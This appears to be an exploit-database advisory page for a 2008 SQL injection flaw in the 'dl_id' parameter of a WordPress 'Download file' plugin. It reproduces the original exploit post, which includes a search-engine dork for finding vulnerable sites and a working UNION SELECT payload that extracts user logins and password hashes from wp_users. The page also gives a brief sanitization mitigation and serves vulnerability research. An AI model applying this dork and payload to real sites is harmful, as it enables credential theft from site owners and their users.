Wordpress Plugin Download file Remote SQL Injection Vulnerability

vendor:

Plugin Download file

by:

BL4CK

CVSS

HIGH

SQL Injection

CWE

Product Name: Plugin Download file

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

WordPress Plugin Download file Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the Wordpress Plugin Download file. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'dl_id' in the 'wp-download.php' file. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

###############################################################
#
# Wordpress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: bl4ck00@gmail.com
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################

# milw0rm.com [2008-03-31]